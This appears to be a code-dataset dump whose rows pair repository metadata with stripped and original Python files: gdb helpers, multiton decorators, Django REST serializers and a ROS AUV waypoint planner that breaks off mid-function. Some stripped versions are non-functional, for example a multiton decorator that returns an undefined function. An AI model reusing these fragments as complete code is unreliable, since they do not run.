debug_merge_point(0, 0, 'times at LOAD_DEREF')
debug_merge_point(0, 0, 'times at LOAD_SELF')
debug_merge_point(0, 0, 'times at SEND')
setfield_gc(p28, 42, descr=<FieldS topaz.executioncontext.ExecutionContext.inst_last_instr 24>)
guard_not_invalidated(descr=<Guard0x100fe5d30>)
p72 = force_token()
i73 = int_lt(i69, i40)
guard_true(i73, descr=<Guard0x100fe5cb8>)
debug_merge_point(0, 0, 'times at JUMP_IF_FALSE')
debug_merge_point(0, 0, 'times at LOAD_DEREF')
debug_merge_point(0, 0, 'times at YIELD')
p74 = force_token()
debug_merge_point(1, 1, 'block in <main> at LOAD_DEREF')
debug_merge_point(1, 1, 'block in <main> at LOAD_CONST')
debug_merge_point(1, 1, 'block in <main> at BUILD_ARRAY')
debug_merge_point(1, 1, 'block in <main> at LOAD_CONST')
debug_merge_point(1, 1, 'block in <main> at BUILD_ARRAY')
debug_merge_point(1, 1, 'block in <main> at SEND_SPLAT')
p75 = force_token()
debug_merge_point(1, 1, 'block in <main> at RETURN')
debug_merge_point(0, 0, 'times at DISCARD_TOP')
debug_merge_point(0, 0, 'times at LOAD_DEREF')
debug_merge_point(0, 0, 'times at LOAD_CONST')
debug_merge_point(0, 0, 'times at SEND')
p76 = force_token()
i77 = int_add(i69, 1)
debug_merge_point(0, 0, 'times at STORE_DEREF')
debug_merge_point(0, 0, 'times at DISCARD_TOP')
debug_merge_point(0, 0, 'times at JUMP')
debug_merge_point(0, 0, 'times at LOAD_DEREF')
setfield_gc(p28, 63, descr=<FieldS topaz.executioncontext.ExecutionContext.inst_last_instr 24>)
i78 = arraylen_gc(p51, descr=<ArrayP 8>)
i79 = arraylen_gc(p66, descr=<ArrayP 8>)
jump(p0, p1, p3, p4, p5, p6, p7, p8, p10, p13, i77, p21, p24, p26, p28, i40, p37, p51, p66, descr=TargetToken(4310782200))
""")
| 2,265 | 8 | 49 |
36cdd3c7289e7770798e8bfc35319a23737ceb61 | 135 | py | Python | atcoder_abc_abc124_d_400_handstand/src/gdbrc.py | miyagaw61/procon | fc00fb9f86dc24df97897a132382243525822500 | [
"MIT"
] | null | null | null | atcoder_abc_abc124_d_400_handstand/src/gdbrc.py | miyagaw61/procon | fc00fb9f86dc24df97897a132382243525822500 | [
"MIT"
] | null | null | null | atcoder_abc_abc124_d_400_handstand/src/gdbrc.py | miyagaw61/procon | fc00fb9f86dc24df97897a132382243525822500 | [
"MIT"
] | null | null | null | e = Exgdb()
c = ExgdbCmd()
#c.b('atcoder_abc_abc124_d_handstand::main')
c.b('main.rs:82')
gdb.execute('run')
gdb.execute('layout src')
| 19.285714 | 44 | 0.688889 | e = Exgdb()
c = ExgdbCmd()
#c.b('atcoder_abc_abc124_d_handstand::main')
c.b('main.rs:82')
gdb.execute('run')
gdb.execute('layout src')
| 0 | 0 | 0 |
5b1b776111a0fefa74b895cad563314d46989830 | 472 | py | Python | profileqc/routines/dependencies.py | sharksmhi/profileqc | dfc96445231ce1974be11536cf839299e908d231 | [
"MIT"
] | null | null | null | profileqc/routines/dependencies.py | sharksmhi/profileqc | dfc96445231ce1974be11536cf839299e908d231 | [
"MIT"
] | 1 | 2022-03-30T09:10:12.000Z | 2022-03-30T09:10:12.000Z | profileqc/routines/dependencies.py | sharksmhi/profileqc | dfc96445231ce1974be11536cf839299e908d231 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# Copyright (c) 2022 SMHI, Swedish Meteorological and Hydrological Institute.
# License: MIT License (see LICENSE.txt or http://opensource.org/licenses/mit).
"""
Created on 2020-07-08 13:19
@author: a002028
"""
class Dependencies:
    """Placeholder for QC routine dependency handling."""
    def __init__(self, **kwargs):
        """Accept and ignore arbitrary keyword arguments.

        NOTE(review): intentionally a no-op for now — the dependencies
        listed in DEV_dependencies.yaml may already be sufficient.
        """
| 23.6 | 79 | 0.639831 | #!/usr/bin/env python
# Copyright (c) 2022 SMHI, Swedish Meteorological and Hydrological Institute.
# License: MIT License (see LICENSE.txt or http://opensource.org/licenses/mit).
"""
Created on 2020-07-08 13:19
@author: a002028
"""
class Dependencies:
"""Doc."""
def __init__(self, **kwargs):
"""Initiate."""
# TODO: what to do here?
# maybe it´s enough with the dependencies
# listed in DEV_dependencies.yaml ?
pass
| 0 | 0 | 0 |
77ff4f6c72e6b02b94290f2cb8fba003ddf0c962 | 1,727 | py | Python | arte/utils/multiton.py | ArcetriAdaptiveOptics/arte | 3d21ae59ba6490be3f52c7957f259097bb42f511 | [
"MIT"
] | 1 | 2021-01-11T20:01:29.000Z | 2021-01-11T20:01:29.000Z | arte/utils/multiton.py | ArcetriAdaptiveOptics/arte | 3d21ae59ba6490be3f52c7957f259097bb42f511 | [
"MIT"
] | 22 | 2020-04-15T15:48:14.000Z | 2021-07-09T07:57:37.000Z | arte/utils/multiton.py | ArcetriAdaptiveOptics/arte | 3d21ae59ba6490be3f52c7957f259097bb42f511 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
#########################################################
#
# who when what
# -------- ---------- ---------------------------------
# apuglisi 2019-09-28 Created
#
#########################################################
def multiton(cls):
'''
Multiton decorator
Decorator that returns the same instance of a class
every time it is instantiated with the same parameters.
All parameters must be able to be passed to str() in order
to build an hashable key.
As a side effect, the class name becomes a function
that returns an instance, rather than a class type instance.
'''
instances = {}
return getinstance
def multiton_id(cls):
'''
Multiton decorator for mutable types
Decorator that returns the same instance of a class
every time it is instantiated with the same parameters.
Similar to "multiton", but uses the id of each argument
to build an hashable key. This allows to pass things
like dictionaries that will be recognized as identical even
if their contents change, but risks not recognizing identical
values of strings and numbers.
As a side effect, the class name becomes a function
that returns an instance, rather than a class type instance.
'''
instances = {}
return getinstance
| 29.271186 | 65 | 0.583671 | # -*- coding: utf-8 -*-
#########################################################
#
# who when what
# -------- ---------- ---------------------------------
# apuglisi 2019-09-28 Created
#
#########################################################
def multiton(cls):
    '''
    Multiton decorator

    Returns the same instance of the decorated class every time it is
    called with the same parameters. Every argument must be convertible
    with str() so a hashable cache key can be built; note the first
    argument takes part in the key but is not forwarded to the
    class constructor.

    As a side effect, the class name becomes a factory function that
    returns instances rather than a class type.
    '''
    cache = {}
    def getinstance(*args):
        lookup_key = '.'.join(str(arg) for arg in args)
        try:
            return cache[lookup_key]
        except KeyError:
            instance = cls(*args[1:])
            cache[lookup_key] = instance
            return instance
    return getinstance
def multiton_id(cls):
    '''
    Multiton decorator for mutable types

    Variant of "multiton" that builds the cache key from the id() of
    each argument instead of its string form. Mutable objects such as
    dictionaries are therefore recognized as the same key even when
    their contents change, at the risk of treating equal-valued strings
    and numbers as distinct. The first argument takes part in the key
    but is not forwarded to the class constructor.

    As a side effect, the class name becomes a factory function that
    returns instances rather than a class type.
    '''
    cache = {}
    def getinstance(*args):
        key = '.'.join(str(id(arg)) for arg in args)
        if key in cache:
            return cache[key]
        created = cls(*args[1:])
        cache[key] = created
        return created
    return getinstance
| 330 | 0 | 54 |
fc0cc9e4c6a73709f706f03f4933cd141b3b0f40 | 7,208 | py | Python | api/serializers.py | yuanlii/heritagesites | 2087882fcb8a928de18fbf1a4bef89b61a80aa05 | [
"MIT"
] | 1 | 2019-09-13T20:12:43.000Z | 2019-09-13T20:12:43.000Z | api/serializers.py | yuanlii/heritagesites | 2087882fcb8a928de18fbf1a4bef89b61a80aa05 | [
"MIT"
] | null | null | null | api/serializers.py | yuanlii/heritagesites | 2087882fcb8a928de18fbf1a4bef89b61a80aa05 | [
"MIT"
] | 7 | 2019-08-02T14:37:40.000Z | 2021-01-29T18:43:40.000Z | from heritagesites.models import CountryArea, DevStatus, HeritageSite, HeritageSiteCategory, \
HeritageSiteJurisdiction, Location, Planet, Region, SubRegion, IntermediateRegion
from rest_framework import response, serializers, status
| 26.895522 | 94 | 0.765261 | from heritagesites.models import CountryArea, DevStatus, HeritageSite, HeritageSiteCategory, \
HeritageSiteJurisdiction, Location, Planet, Region, SubRegion, IntermediateRegion
from rest_framework import response, serializers, status
class PlanetSerializer(serializers.ModelSerializer):
    """Flat serializer for Planet (id, name, UNSD name)."""
    class Meta:
        model = Planet
        fields = ('planet_id', 'planet_name', 'unsd_name')
class RegionSerializer(serializers.ModelSerializer):
    """Flat serializer for Region; exposes the parent planet by id."""
    class Meta:
        model = Region
        fields = ('region_id', 'region_name', 'planet_id')
class SubRegionSerializer(serializers.ModelSerializer):
    """Flat serializer for SubRegion; exposes the parent region by id."""
    class Meta:
        model = SubRegion
        fields = ('sub_region_id', 'sub_region_name', 'region_id')
class IntermediateRegionSerializer(serializers.ModelSerializer):
    """Flat serializer for IntermediateRegion; parent sub-region by id."""
    class Meta:
        model = IntermediateRegion
        fields = ('intermediate_region_id', 'intermediate_region_name', 'sub_region_id')
class LocationSerializer(serializers.ModelSerializer):
    """Location with its nested, read-only UNSD hierarchy levels."""
    planet = PlanetSerializer(many=False, read_only=True)
    region = RegionSerializer(many=False, read_only=True)
    sub_region = SubRegionSerializer(many=False, read_only=True)
    intermediate_region = IntermediateRegionSerializer(many=False, read_only=True)
    class Meta:
        model = Location
        fields = ('location_id', 'planet', 'region', 'sub_region', 'intermediate_region')
class DevStatusSerializer(serializers.ModelSerializer):
    """Flat serializer for DevStatus (development status lookup)."""
    class Meta:
        model = DevStatus
        fields = ('dev_status_id', 'dev_status_name')
class CountryAreaSerializer(serializers.ModelSerializer):
    """Country/area with nested development status and location."""
    dev_status = DevStatusSerializer(many=False, read_only=True)
    location = LocationSerializer(many=False, read_only=True)
    class Meta:
        model = CountryArea
        fields = (
            'country_area_id',
            'country_area_name',
            'm49_code',
            'iso_alpha3_code',
            'dev_status',
            'location')
class HeritageSiteCategorySerializer(serializers.ModelSerializer):
    """Flat serializer for HeritageSiteCategory (cultural/natural/mixed)."""
    class Meta:
        model = HeritageSiteCategory
        fields = ('category_id', 'category_name')
class HeritageSiteJurisdictionSerializer(serializers.ModelSerializer):
    """Junction row linking a HeritageSite to a CountryArea (ids only)."""
    heritage_site_id = serializers.ReadOnlyField(source='heritage_site.heritage_site_id')
    country_area_id = serializers.ReadOnlyField(source='country_area.country_area_id')
    class Meta:
        model = HeritageSiteJurisdiction
        fields = ('heritage_site_id', 'country_area_id')
class HeritageSiteSerializer(serializers.ModelSerializer):
    """Read/write serializer for HeritageSite.

    Read side nests the category and the jurisdiction junction rows.
    Write side accepts primary keys via ``heritage_site_category_id`` and
    ``jurisdiction_ids``; both declare a ``source``, so their deserialized
    values appear in ``validated_data`` under the source names
    ('heritage_site_category' and 'heritage_site_jurisdiction').
    """
    site_name = serializers.CharField(
        allow_blank=False,
        max_length=255
    )
    description = serializers.CharField(
        allow_blank=False
    )
    justification = serializers.CharField(
        allow_blank=True
    )
    date_inscribed = serializers.IntegerField(
        allow_null=True
    )
    longitude = serializers.DecimalField(
        allow_null=True,
        max_digits=11,
        decimal_places=8)
    latitude = serializers.DecimalField(
        allow_null=True,
        max_digits=10,
        decimal_places=8
    )
    area_hectares = serializers.FloatField(
        allow_null=True
    )
    transboundary = serializers.IntegerField(
        allow_null=False
    )
    heritage_site_category = HeritageSiteCategorySerializer(
        many=False,
        read_only=True
    )
    heritage_site_category_id = serializers.PrimaryKeyRelatedField(
        allow_null=False,
        many=False,
        write_only=True,
        queryset=HeritageSiteCategory.objects.all(),
        source='heritage_site_category'
    )
    heritage_site_jurisdiction = HeritageSiteJurisdictionSerializer(
        source='heritage_site_jurisdiction_set',  # Note use of _set
        many=True,
        read_only=True
    )
    jurisdiction_ids = serializers.PrimaryKeyRelatedField(
        many=True,
        write_only=True,
        queryset=CountryArea.objects.all(),
        source='heritage_site_jurisdiction'
    )
    class Meta:
        model = HeritageSite
        fields = (
            'heritage_site_id',
            'site_name',
            'description',
            'justification',
            'date_inscribed',
            'longitude',
            'latitude',
            'area_hectares',
            'transboundary',
            'heritage_site_category',
            'heritage_site_category_id',
            'heritage_site_jurisdiction',
            'jurisdiction_ids'
        )
    def create(self, validated_data):
        """Persist a new HeritageSite plus its jurisdiction junction rows.

        The deserialized CountryArea list (submitted as `jurisdiction_ids`,
        stored under its source key 'heritage_site_jurisdiction') is popped
        before the HeritageSite itself is saved; each country is then linked
        through the heritage_site_jurisdiction junction table.

        :param validated_data: deserialized, validated input
        :return: the new HeritageSite instance
        """
        countries = validated_data.pop('heritage_site_jurisdiction')
        site = HeritageSite.objects.create(**validated_data)
        if countries is not None:
            for country in countries:
                HeritageSiteJurisdiction.objects.create(
                    heritage_site_id=site.heritage_site_id,
                    country_area_id=country.country_area_id
                )
        return site
    def update(self, instance, validated_data):
        """Update a HeritageSite and synchronize its jurisdiction rows.

        :param instance: the HeritageSite being updated
        :param validated_data: deserialized, validated input
        :return: the updated instance
        """
        site_id = instance.heritage_site_id
        new_countries = validated_data.pop('heritage_site_jurisdiction')
        instance.site_name = validated_data.get(
            'site_name',
            instance.site_name
        )
        instance.description = validated_data.get(
            'description',
            instance.description
        )
        instance.justification = validated_data.get(
            'justification',
            instance.justification
        )
        instance.date_inscribed = validated_data.get(
            'date_inscribed',
            instance.date_inscribed
        )
        instance.longitude = validated_data.get(
            'longitude',
            instance.longitude
        )
        instance.latitude = validated_data.get(
            'latitude',
            instance.latitude
        )
        instance.area_hectares = validated_data.get(
            'area_hectares',
            instance.area_hectares
        )
        # BUG FIX: the writable field declares source='heritage_site_category',
        # so DRF stores the deserialized HeritageSiteCategory instance under
        # that key; the old lookup under 'heritage_site_category_id' never
        # matched, which meant the category could never be changed on update.
        instance.heritage_site_category = validated_data.get(
            'heritage_site_category',
            instance.heritage_site_category
        )
        instance.transboundary = validated_data.get(
            'transboundary',
            instance.transboundary
        )
        instance.save()
        # Synchronize the junction table with the submitted country list.
        new_ids = []
        old_ids = HeritageSiteJurisdiction.objects \
            .values_list('country_area_id', flat=True) \
            .filter(heritage_site_id__exact=site_id)
        # Insert junction rows for countries not already linked.
        for country in new_countries:
            new_id = country.country_area_id
            new_ids.append(new_id)
            if new_id in old_ids:
                continue
            HeritageSiteJurisdiction.objects \
                .create(heritage_site_id=site_id, country_area_id=new_id)
        # Delete junction rows for countries no longer submitted.
        for old_id in old_ids:
            if old_id in new_ids:
                continue
            HeritageSiteJurisdiction.objects \
                .filter(heritage_site_id=site_id, country_area_id=old_id) \
                .delete()
        return instance
e23c6a492715258836584b050d10ded1372f53ed | 17,270 | py | Python | auv_simple_motion_planner/scripts/wp_depth_action_planner.py | Jollerprutt/smarc_missions | dd431c82400315c0ebd3d2b8e185f0b94ee9d3e8 | [
"BSD-3-Clause"
] | null | null | null | auv_simple_motion_planner/scripts/wp_depth_action_planner.py | Jollerprutt/smarc_missions | dd431c82400315c0ebd3d2b8e185f0b94ee9d3e8 | [
"BSD-3-Clause"
] | null | null | null | auv_simple_motion_planner/scripts/wp_depth_action_planner.py | Jollerprutt/smarc_missions | dd431c82400315c0ebd3d2b8e185f0b94ee9d3e8 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/python
# Copyright 2018 Nils Bore, Sriharsha Bhat (nbore@kth.se, svbhat@kth.se)
#
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from __future__ import division, print_function
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from nav_msgs.msg import Path
from geometry_msgs.msg import PoseStamped, PointStamped
from move_base_msgs.msg import MoveBaseFeedback, MoveBaseResult, MoveBaseAction
import actionlib
import rospy
import tf
from sam_msgs.msg import ThrusterRPMs, ThrusterAngles
from std_msgs.msg import Float64, Header, Bool
import math
from visualization_msgs.msg import Marker
from tf.transformations import quaternion_from_euler
if __name__ == '__main__':
rospy.init_node('wp_depth_action_planner')
planner = WPDepthPlanner(rospy.get_name())
| 45.809019 | 757 | 0.666589 | #!/usr/bin/python
# Copyright 2018 Nils Bore, Sriharsha Bhat (nbore@kth.se, svbhat@kth.se)
#
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from __future__ import division, print_function
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from nav_msgs.msg import Path
from geometry_msgs.msg import PoseStamped, PointStamped
from move_base_msgs.msg import MoveBaseFeedback, MoveBaseResult, MoveBaseAction
import actionlib
import rospy
import tf
from sam_msgs.msg import ThrusterRPMs, ThrusterAngles
from std_msgs.msg import Float64, Header, Bool
import math
from visualization_msgs.msg import Marker
from tf.transformations import quaternion_from_euler
class WPDepthPlanner(object):
    """Waypoint-following MoveBase action server for the SAM AUV.

    On each goal it publishes yaw and depth setpoints toward the waypoint,
    driving the vehicle either with fixed forward RPM or a velocity
    controller, and optionally performing a thrust-vectored "turbo turn"
    for large heading errors. Goal completion is checked by a separate
    0.5 s ROS timer (timer_callback), which clears self.nav_goal.
    """
    # create messages that are used to publish feedback/result
    _feedback = MoveBaseFeedback()
    _result = MoveBaseResult()
    def create_marker(self, yaw_setpoint, depth_setpoint):
        """Publish an RViz arrow marker at the last feedback position, pointing along yaw_setpoint.

        depth_setpoint is accepted but not used in the marker (position comes
        from the cached action feedback).
        """
        self.marker.header.frame_id = "/sam/odom"
        self.marker.header.stamp = rospy.Time(0)
        self.marker.ns = "/sam/viz"
        self.marker.id = 0
        self.marker.type = 0  # visualization_msgs/Marker type 0 == ARROW
        self.marker.action = 0  # action 0 == ADD/MODIFY
        self.marker.pose.position.x = self._feedback.base_position.pose.position.x
        self.marker.pose.position.y = self._feedback.base_position.pose.position.y
        self.marker.pose.position.z = self._feedback.base_position.pose.position.z
        q = quaternion_from_euler(0,0,yaw_setpoint)
        self.marker.pose.orientation.x = q[0]
        self.marker.pose.orientation.y = q[1]
        self.marker.pose.orientation.z = q[2]
        self.marker.pose.orientation.w = q[3]
        self.marker.scale.x = 1
        self.marker.scale.y = 0.1
        self.marker.scale.z = 0.1
        self.marker.color.a = 1.0 # Dont forget to set the alpha!
        self.marker.color.r = 1.0
        self.marker.color.g = 1.0
        self.marker.color.b = 1.0
        self.marker_pub.publish(self.marker)
    def yaw_feedback_cb(self,yaw_feedback):
        """Subscriber callback: cache the latest measured yaw (std_msgs/Float64)."""
        self.yaw_feedback= yaw_feedback.data
    def angle_wrap(self,angle):
        """Wrap an angle into (-pi, pi] by subtracting one full turn when out of range.

        NOTE(review): 3.141516 is not pi (3.1415926...) — looks like a typo
        carried through both uses on the same line; confirm intended value.
        """
        if(abs(angle)>3.141516):
            angle= angle - (abs(angle)/angle)*2*3.141516; #Angle wrapping between -pi and pi
            rospy.loginfo_throttle_identical(20, "Angle Error Wrapped")
        return angle
    def turbo_turn(self,angle_error):
        """Perform one thrust-vectored flip cycle toward reducing angle_error.

        Sets the rudder to one side and thrusts forward for half a flip
        period, then mirrors the rudder and thrusts in reverse for the other
        half. Turn direction is taken from the sign of angle_error.
        Blocks for ~1/flip_rate seconds (or until rospy shutdown).
        """
        rpm = self.turbo_turn_rpm
        rudder_angle = self.rudder_angle
        flip_rate = self.flip_rate
        left_turn = True
        #left turn increases value of yaw angle towards pi, right turn decreases it towards -pi.
        if angle_error < 0:
            left_turn = False
            rospy.loginfo('Right turn!')
        rospy.loginfo('Turbo Turning!')
        if left_turn:
            rudder_angle = -rudder_angle
        thrust_rate = 11.
        rate = rospy.Rate(thrust_rate)
        self.vec_pub.publish(0., rudder_angle, Header())
        loop_time = 0.
        while not rospy.is_shutdown() and loop_time < .5/flip_rate:
            self.rpm_pub.publish(rpm, rpm, Header())
            loop_time += 1./thrust_rate
            rate.sleep()
        self.vec_pub.publish(0., -rudder_angle, Header())
        loop_time = 0.
        while not rospy.is_shutdown() and loop_time < .5/flip_rate:
            self.rpm_pub.publish(-rpm, -rpm, Header())
            loop_time += 1./thrust_rate
            rate.sleep()
    def execute_cb(self, goal):
        """Action-server execute callback: drive toward the goal until reached or preempted.

        Transforms the goal into self.nav_goal_frame, then loops at ~11 Hz:
        every 5th iteration it refreshes the TF pose, publishes action
        feedback and recomputes yaw/depth setpoints; every iteration it
        publishes actuator commands. Exits when timer_callback clears
        self.nav_goal (success) or on preemption.
        """
        rospy.loginfo("Goal received")
        success = True
        self.nav_goal = goal.target_pose.pose
        self.nav_goal_frame = goal.target_pose.header.frame_id
        if self.nav_goal_frame is None or self.nav_goal_frame == '':
            rospy.logwarn("Goal has no frame id! Using utm by default")
            self.nav_goal_frame = 'utm'
        goal_point = PointStamped()
        goal_point.header.frame_id = self.nav_goal_frame
        goal_point.header.stamp = rospy.Time(0)
        goal_point.point.x = self.nav_goal.position.x
        goal_point.point.y = self.nav_goal.position.y
        goal_point.point.z = self.nav_goal.position.z
        try:
            # NOTE(review): transforming from nav_goal_frame into nav_goal_frame
            # is an identity transform — presumably a different target frame was
            # intended here; confirm.
            goal_point_local = self.listener.transformPoint(self.nav_goal_frame, goal_point)
            self.nav_goal.position.x = goal_point_local.point.x
            self.nav_goal.position.y = goal_point_local.point.y
            self.nav_goal.position.z = goal_point_local.point.z
        except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):
            print ("Not transforming point to world local")
            pass
        rospy.loginfo('Nav goal in local %s ' % self.nav_goal.position.x)
        r = rospy.Rate(11.) # 10hz
        counter = 0
        while not rospy.is_shutdown() and self.nav_goal is not None:
            self.yaw_pid_enable.publish(True)
            self.depth_pid_enable.publish(True)
            # Preempted
            if self._as.is_preempt_requested():
                rospy.loginfo('%s: Preempted' % self._action_name)
                success = False
                self.nav_goal = None
                # Stop thrusters
                rpm = ThrusterRPMs()
                rpm.thruster_1_rpm = 0.
                rpm.thruster_2_rpm = 0.
                self.rpm_pub.publish(rpm)
                self.yaw_pid_enable.publish(False)
                self.depth_pid_enable.publish(False)
                self.vbs_pid_enable.publish(False)
                self.vel_pid_enable.publish(False)
                print('wp depth action planner: stopped thrusters')
                self._as.set_preempted(self._result, "Preempted WP action")
                return
            # Publish feedback
            # Feedback/setpoint refresh runs only every 5th loop iteration; the
            # setpoint variables persist between iterations.
            if counter % 5 == 0:
                try:
                    (trans, rot) = self.listener.lookupTransform(self.nav_goal_frame, self.base_frame, rospy.Time(0))
                except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):
                    rospy.loginfo("Error with tf:"+str(self.nav_goal_frame) + " to "+str(self.base_frame))
                    continue
                pose_fb = PoseStamped()
                pose_fb.header.frame_id = self.nav_goal_frame
                pose_fb.pose.position.x = trans[0]
                pose_fb.pose.position.y = trans[1]
                pose_fb.pose.position.z = trans[2]
                self._feedback.base_position = pose_fb
                self._feedback.base_position.header.stamp = rospy.get_rostime()
                self._as.publish_feedback(self._feedback)
                #rospy.loginfo("Sending feedback")
                #Compute yaw setpoint.
                xdiff = self.nav_goal.position.x - pose_fb.pose.position.x
                ydiff = self.nav_goal.position.y - pose_fb.pose.position.y
                yaw_setpoint = math.atan2(ydiff,xdiff)
                print('xdiff:',xdiff,'ydiff:',ydiff,'yaw_setpoint:',yaw_setpoint)
                #compute yaw_error (e.g. for turbo_turn)
                yaw_error= -(self.yaw_feedback - yaw_setpoint)
                yaw_error= self.angle_wrap(yaw_error) #wrap angle error between -pi and pi
                depth_setpoint = self.nav_goal.position.z
                self.depth_pub.publish(depth_setpoint)
                #self.vbs_pid_enable.publish(False)
                #self.vbs_pub.publish(depth_setpoint)
            if self.vel_ctrl_flag:
                rospy.loginfo_throttle_identical(5, "vel ctrl, no turbo turn")
                #with Velocity control
                self.yaw_pid_enable.publish(True)
                self.yaw_pub.publish(yaw_setpoint)
                # Publish to velocity controller
                self.vel_pid_enable.publish(True)
                self.vel_pub.publish(self.vel_setpoint)
                self.roll_pub.publish(self.roll_setpoint)
                #rospy.loginfo("Velocity published")
            else:
                if self.turbo_turn_flag:
                    #if turbo turn is included
                    rospy.loginfo("Yaw error: %f", yaw_error)
                    if abs(yaw_error) > self.turbo_angle_min and abs(yaw_error) < self.turbo_angle_max:
                        #turbo turn with large deviations, maximum deviation is 3.0 radians to prevent problems with discontinuities at +/-pi
                        self.yaw_pid_enable.publish(False)
                        self.turbo_turn(yaw_error)
                        # During turbo turn, depth is held by the VBS (buoyancy)
                        # controller instead of the dynamic depth controller.
                        self.depth_pid_enable.publish(False)
                        self.vbs_pid_enable.publish(True)
                        self.vbs_pub.publish(depth_setpoint)
                    else:
                        rospy.loginfo_throttle_identical(5,"Normal WP following")
                        #normal turning if the deviation is small
                        self.vbs_pid_enable.publish(False)
                        self.depth_pid_enable.publish(True)
                        self.yaw_pid_enable.publish(True)
                        self.yaw_pub.publish(yaw_setpoint)
                        self.create_marker(yaw_setpoint,depth_setpoint)
                        # Thruster forward
                        rpm = ThrusterRPMs()
                        rpm.thruster_1_rpm = self.forward_rpm
                        rpm.thruster_2_rpm = self.forward_rpm
                        self.rpm_pub.publish(rpm)
                        #rospy.loginfo("Thrusters forward")
                else:
                    #turbo turn not included, no velocity control
                    rospy.loginfo_throttle_identical(5, "Normal WP following, no turbo turn")
                    self.yaw_pid_enable.publish(True)
                    self.yaw_pub.publish(yaw_setpoint)
                    self.create_marker(yaw_setpoint,depth_setpoint)
                    # Thruster forward
                    rpm = ThrusterRPMs()
                    rpm.thruster_1_rpm = self.forward_rpm
                    rpm.thruster_2_rpm = self.forward_rpm
                    self.rpm_pub.publish(rpm)
                    #rospy.loginfo("Thrusters forward")
            counter += 1
            r.sleep()
        # Stop thruster
        self.vel_pid_enable.publish(False)
        rpm = ThrusterRPMs()
        rpm.thruster_1_rpm = 0.0
        rpm.thruster_2_rpm = 0.0
        self.rpm_pub.publish(rpm)
        #Stop controllers
        self.yaw_pid_enable.publish(False)
        self.depth_pid_enable.publish(False)
        self.vbs_pid_enable.publish(False)
        self.vel_pid_enable.publish(False)
        rospy.loginfo('%s: Succeeded' % self._action_name)
        self._as.set_succeeded(self._result)
    def timer_callback(self, event):
        """Periodic (0.5 s) goal-reached check; clears self.nav_goal on success.

        Success when the XY distance is below wp_tolerance AND the depth
        difference (compared on absolute values) is below depth_tolerance.
        """
        if self.nav_goal is None:
            #rospy.loginfo_throttle(30, "Nav goal is None!")
            return
        try:
            (trans, rot) = self.listener.lookupTransform(self.nav_goal_frame, self.base_frame, rospy.Time(0))
        except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):
            return
        # TODO: we could use this code for the other check also
        goal_point = PointStamped()
        goal_point.header.frame_id = self.nav_goal_frame
        goal_point.header.stamp = rospy.Time(0)
        goal_point.point.x = self.nav_goal.position.x
        goal_point.point.y = self.nav_goal.position.y
        goal_point.point.z = self.nav_goal.position.z
        #print("Checking if nav goal is reached!")
        start_pos = np.array(trans)
        end_pos = np.array([self.nav_goal.position.x, self.nav_goal.position.y, self.nav_goal.position.z])
        # We check for success out of the main control loop in case the main control loop is
        # running at 300Hz or sth. like that. We dont need to check succes that frequently.
        xydiff = start_pos[:2] - end_pos[:2]
        zdiff = np.abs(np.abs(start_pos[2]) - np.abs(end_pos[2]))
        xydiff_norm = np.linalg.norm(xydiff)
        rospy.logdebug("diff xy:"+ str(xydiff_norm)+' z:' + str(zdiff))
        if xydiff_norm < self.wp_tolerance and zdiff < self.depth_tolerance:
            rospy.loginfo("Reached goal!")
